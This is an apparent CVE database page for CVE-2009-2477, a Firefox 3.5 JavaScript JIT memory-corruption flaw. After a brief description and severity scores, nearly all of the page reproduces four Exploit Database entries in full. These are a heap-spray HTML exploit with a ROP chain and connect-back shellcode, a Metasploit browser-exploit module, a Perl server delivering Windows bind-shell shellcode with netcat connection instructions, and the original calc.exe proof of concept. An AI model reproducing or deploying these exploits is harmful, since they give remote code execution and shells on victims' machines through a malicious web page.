CVE-2009-2477 Detail

CVE-2009-2477

CVE Descriptions

js/src/jstracer.cpp in the Just-in-time (JIT) JavaScript compiler (aka TraceMonkey) in Mozilla Firefox 3.5 before 3.5.1 allows remote attackers to execute arbitrary code via certain use of the escape function that triggers access to uninitialized memory locations, as originally demonstrated by a document containing P and FONT elements.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-94	Improper Control of Generation of Code ('Code Injection') The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	9.3		AV:N/AC:M/Au:N/C:C/I:C/A:C	[email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 40936

Publication date : 2016-12-17 23h00 +00:00
Author : Hacker Fantastic
EDB Verified : Yes

<html> <head> <div id="content"> <p> <FONT> </FONT> </p> <p> <FONT>n0m3rcYn0M3rCyn0m3Rc</FONT></p> <p> <FONT>N0MeRCYn0m3rCyn0m3rCyn0m</FONT> </p> <p> <FONT>n0MERCypDK </FONT> </p> </div> <script language="JavaScript"> var xunescape = unescape; oneblock = xunescape("%u0040%u1000"); stackpivot = xunescape("%u6885%u0805%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u5a91%u0805%u4141%u4141"); nopsled = xunescape("%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568"); ropgadget = xunescape("%udc08%u0490%ua408%u04bd%u0008%u0200%u0000%u0f00%u0700%u0000%u2200%u0000%u0000%u0000%u0000%u0000%uec00%u0491%u0008%u0200%u0000%u0200%uc100%u10e3%u0040%u0010%u0000%u0200%u9000")  shellcode = xunescape("%u9090%u9090%u9090%u9090%u9090%u3190%u53db%u5343%u026a%u666a%u8958%ucde1%u9380%ub059%ucd3f%u4980%uf979%u5a5b%uc068%u00a8%u660a%u0068%u4350%u5366%ue189%u66b0%u5150%u8953%u43e1%u80cd%u6852%u2f2f%u6873%u2f68%u6962%u896e%u52e3%u8953%ub0e1%ucd0b%u0080%u6568%u7061%u6120%u6464%u3a72%u2520%u3830%u0a78%u7200%u6e75%u696e%u676e%u6620%u6f72%u206d%u6568%u2061"); var fullblock = oneblock; while (fullblock.length < 393216) { fullblock += fullblock; } var sprayContainer = new Array(); var sprayready = false; var sprayContainerIndex = 0; function fill_function() { if(! sprayready) { for (xi=0; xi<800/100; xi++, sprayContainerIndex++) { sprayContainer[sprayContainerIndex] = fullblock + stackpivot + oneblock + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + nopsled + ropgadget + shellcode; } } else { DataTranslator(); GenerateHTML(); } if(sprayContainer.length >= 1000) { sprayready = true; } } var searchArray = new Array(); function escapeData(data) { var xi; var xc; var escData=''; for(xi=0; xi<data.length; xi++) { xc=data.charAt(xi); if(xc=='&' || xc=='?' || xc=='=' || xc=='%' || xc==' ') xc = escape(xc); escData+=xc; } return escData; } function DataTranslator() { searchArray = new Array(); searchArray[0] = new Array(); searchArray[0]["dac"] = "Kros"; var newElement = document.getElementById("content"); if (document.getElementsByTagName) { var xi=0; pTags = newElement.getElementsByTagName("p"); if (pTags.length > 0) while (xi < pTags.length) { oTags = pTags[xi].getElementsByTagName("font"); searchArray[xi+1] = new Array(); if (oTags[0]) { searchArray[xi+1]["dac"] = oTags[0].innerHTML; } xi++; } } } function GenerateHTML() { var xhtml = ""; for (xi=1;xi<searchArray.length;xi++) { xhtml += escapeData(searchArray[xi]["dac"]); } } setInterval("fill_function()", .5); </script> </body> </html>

Exploit Database EDB-ID : 16299

Publication date : 2010-09-19 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: firefox_escape_retval.rb 10394 2010-09-20 08:06:27Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking # # This module acts as an HTTP server # include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::FF, :ua_minver => "3.5", :ua_maxver => "3.5", :os_name => OperatingSystems::WINDOWS, :javascript => true, :rank => NormalRanking, # reliable memory corruption :vuln_test => nil, }) def initialize(info = {}) super(update_info(info, 'Name' => 'Firefox 3.5 escape() Return Value Memory Corruption', 'Description' => %q{ This module exploits a memory corruption vulnerability in the Mozilla Firefox browser. This flaw occurs when a bug in the javascript interpreter fails to preserve the return value of the escape() function and results in uninitialized memory being used instead. This module has only been tested on Windows, but should work on other platforms as well with the current targets. }, 'License' => MSF_LICENSE, 'Author' => [ 'Simon Berry-Byrne <x00050876[at]itnet.ie>', # Author / Publisher / Original exploit 'hdm', # Metasploit conversion ], 'Version' => '$Revision: 10394 $', 'References' => [ ['CVE', '2009-2477'], ['OSVDB', '55846'], ['BID', '35660'], ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=503286'] ], 'Payload' => { 'Space' => 1000 + (rand(256).to_i * 4), 'BadChars' => "\x00", }, 'Targets' => [ [ 'Firefox 3.5.0 on Windows XP SP0-SP3', { 'Platform' => 'win', 'Arch' => ARCH_X86, 'Ret' => 0x0c0c0c0c, 'BlockLen' => 0x60000, 'Containers' => 800, } ], [ 'Firefox 3.5.0 on Mac OS X 10.5.7 (Intel)', { 'Platform' => 'osx', 'Arch' => ARCH_X86, 'Ret' => 0x41414141, 'BlockLen' => 496, 'Containers' => 800000 } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 14 2006' )) end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html; charset=utf-8' }) handler(cli) end def generate_html(payload) enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch)) enc_ret = Rex::Text.to_unescape( Rex::Arch.endian(target.arch) == ENDIAN_LITTLE ? [target.ret].pack('V') : [target.ret].pack('N') ) var_data_str1 = Rex::Text.rand_text_alpha(3) var_data_str2 = Rex::Text.rand_text_alpha(4) js = <<-EOF var xunescape = unescape; var shellcode = xunescape("#{enc_code}"); oneblock = xunescape("#{enc_ret}"); var fullblock = oneblock; while (fullblock.length < #{target['BlockLen']}) { fullblock += fullblock; } var sprayContainer = new Array(); var sprayready = false; var sprayContainerIndex = 0; function fill_function() { if(! sprayready) { for (xi=0; xi<#{target['Containers']}/100; xi++, sprayContainerIndex++) { sprayContainer[sprayContainerIndex] = fullblock + shellcode; } } else { DataTranslator(); GenerateHTML(); } if(sprayContainer.length >= #{target['Containers']}) { sprayready = true; } } var searchArray = new Array(); function escapeData(data) { var xi; var xc; var escData=''; for(xi=0; xi<data.length; xi++) { xc=data.charAt(xi); if(xc=='&' || xc=='?' || xc=='=' || xc=='%' || xc==' ') xc = escape(xc); escData+=xc; } return escData; } function DataTranslator() { searchArray = new Array(); searchArray[0] = new Array(); searchArray[0]["#{var_data_str1}"] = "#{var_data_str2}"; var newElement = document.getElementById("content"); if (document.getElementsByTagName) { var xi=0; pTags = newElement.getElementsByTagName("p"); if (pTags.length > 0) while (xi < pTags.length) { oTags = pTags[xi].getElementsByTagName("font"); searchArray[xi+1] = new Array(); if (oTags[0]) { searchArray[xi+1]["#{var_data_str1}"] = oTags[0].innerHTML; } xi++; } } } function GenerateHTML() { var xhtml = ""; for (xi=1;xi<searchArray.length;xi++) { xhtml += escapeData(searchArray[xi]["#{var_data_str1}"]); } } setInterval("fill_function()", .5); EOF # Obfuscate it up a bit js = obfuscate_js(js, 'Symbols' => { 'Variables' => %W{ DataTranslator GenerateHTML escapeData xunescape shellcode oneblock fullblock sprayContainer xi searchArray xc escData xhtml pTags oTags newElement sprayready sprayContainerIndex fill_function } }).to_s str1 = Rex::Text.rand_text_alpha(20) str2 = Rex::Text.rand_text_alpha(24) str3 = Rex::Text.rand_text_alpha(10) + " " return %Q^ <html> <head> <div id="content"> <p> <FONT> </FONT> </p> <p> <FONT>#{str1}</FONT></p> <p> <FONT>#{str2}</FONT> </p> <p> <FONT>#{str3}</FONT> </p> </div> <script language="JavaScript"> #{js} </script> </body> </html> ^ end end

Exploit Database EDB-ID : 9214

Publication date : 2009-07-19 22h00 +00:00
Author : netsoul
EDB Verified : Yes

################################################## # FireFox 3.5 Heap Spray # Discovered by: Simon Berry-Bryne # Coded in Perl by netsoul, ALTO PARANA - Paraguay # Contact: netsoul2 [at] gmail [dot] com ################################################## #!/usr/bin/perl -w use strict; use POE::Component::Server::HTTP; POE::Component::Server::HTTP->new(Port => my $port = 8080, ContentHandler => {"/" => sub{$_[1]->push_header("Content-Type", "text/html"), $_[1]->content(<DATA>)}}); print "[-] Listening in port $port...\n[-] Sending payload...\n[-] After 30 secs try with netcat for connect in port 5500\n"; POE::Kernel->run(); __DATA__ <html> <head> <title>Exploiting Firefox 3.5</title> <script language= javascript> //windows - shell_bind_tcp - metasploit - encoding is shikata_ga_nai var shellcode= unescape("%u6afc%u4deb%uf9e8%uffff%u60ff%u6c8b%u2424%u458b%u8b3c%u057c%u0178%u8bef" + "%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca" + "%uc201%uf4eb%u543b%u2824%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01" + "%u2c03%u898b%u246c%u611c%u31c3%u64db%u438b%u8b30%u0c40%u708b%uad1c%u408b" + "%u5e08%u8e68%u0e4e%u50ec%ud6ff%u5366%u6866%u3233%u7768%u3273%u545f%ud0ff" + "%ucb68%ufced%u503b%ud6ff%u895f%u66e5%ued81%u0208%u6a55%uff02%u68d0%u09d9" + "%uadf5%uff57%u53d6%u5353%u5353%u5343%u5343%ud0ff%u6866%u7c15%u5366%ue189" + "%u6895%u1aa4%uc770%uff57%u6ad6%u5110%uff55%u68d0%uada4%ue92e%uff57%u53d6" + "%uff55%u68d0%u49e5%u4986%uff57%u50d6%u5454%uff55%u93d0%ue768%uc679%u5779" + "%ud6ff%uff55%u66d0%u646a%u6866%u6d63%ue589%u506a%u2959%u89cc%u6ae7%u8944" + "%u31e2%uf3c0%ufeaa%u2d42%u42fe%u932c%u7a8d%uab38%uabab%u7268%ub3fe%uff16" + "%u4475%ud6ff%u575b%u5152%u5151%u016a%u5151%u5155%ud0ff%uad68%u05d9%u53ce" + "%ud6ff%uff6a%u37ff%ud0ff%u578b%u83fc%u64c4%ud6ff%uff52%u68d0%uceef%u60e0" + "%uff53%uffd6%u41d0"); oneblock = unescape("%u0c0c%u0c0c"); var fullblock = oneblock; while (fullblock.length<0x60000) { fullblock += fullblock; } sprayContainer = new Array(); for (i=0; i<600; i++) { sprayContainer[i] = fullblock + shellcode; } var searchArray = new Array() function escapeData(data) { var i; var c; var escData=''; for(i=0;i<data.length;i++) { c=data.charAt(i);$poe_kernel if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c); escData+=c; } return escData; } function DataTranslator(){ searchArray = new Array(); searchArray[0] = new Array(); searchArray[0]["str"] = "blah"; var newElement = document.getElementById("content") if (document.getElementsByTagName) { var i=0; pTags = newElement.getElementsByTagName("p") if (pTags.length > 0) while (i<pTags.length) { oTags = pTags[i].getElementsByTagName("font") searchArray[i+1] = new Array() if (oTags[0]) { searchArray[i+1]["str"] = oTags[0].innerHTML; } i++ } } } function GenerateHTML() { var html = ""; for (i=1;i<searchArray.length;i++) { html += escapeData(searchArray[i]["str"]) } } DataTranslator(); GenerateHTML() </script> </body> </html> # milw0rm.com [2009-07-20]

Exploit Database EDB-ID : 9137

Publication date : 2009-07-12 22h00 +00:00
Author : Sberry
EDB Verified : Yes

<html> <head> <title>Firefox 3.5 Vulnerability</title> Firefox 3.5 Heap Spray Vulnerabilty </br> Author: SBerry aka Simon Berry-Byrne </br> Thanks to HD Moore for the insight and Metasploit for the payload <div id="content"> <p> <FONT> </FONT> </p> <p> <FONT>Loremipsumdoloregkuw</FONT></p> <p> <FONT>Loremipsumdoloregkuwiert</FONT> </p> <p> <FONT>Loremikdkw </FONT> </p> </div> <script language=JavaScript> /* Calc.exe */ var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" + "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" + "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" + "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" + "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" + "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" + "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" + "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" + "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" + "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" + "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" + "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" + "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" + "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" + "%u652E%u6578%u9000"); /* Heap Spray Code */ oneblock = unescape("%u0c0c%u0c0c"); var fullblock = oneblock; while (fullblock.length<0x60000) { fullblock += fullblock; } sprayContainer = new Array(); for (i=0; i<600; i++) { sprayContainer[i] = fullblock + shellcode; } var searchArray = new Array() function escapeData(data) { var i; var c; var escData=''; for(i=0;i<data.length;i++) { c=data.charAt(i); if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c); escData+=c; } return escData; } function DataTranslator(){ searchArray = new Array(); searchArray[0] = new Array(); searchArray[0]["str"] = "blah"; var newElement = document.getElementById("content") if (document.getElementsByTagName) { var i=0; pTags = newElement.getElementsByTagName("p") if (pTags.length > 0) while (i<pTags.length) { oTags = pTags[i].getElementsByTagName("font") searchArray[i+1] = new Array() if (oTags[0]) { searchArray[i+1]["str"] = oTags[0].innerHTML; } i++ } } } function GenerateHTML() { var html = ""; for (i=1;i<searchArray.length;i++) { html += escapeData(searchArray[i]["str"]) } } DataTranslator(); GenerateHTML() </script> </body> </html> <html><body></body></html> # milw0rm.com [2009-07-13]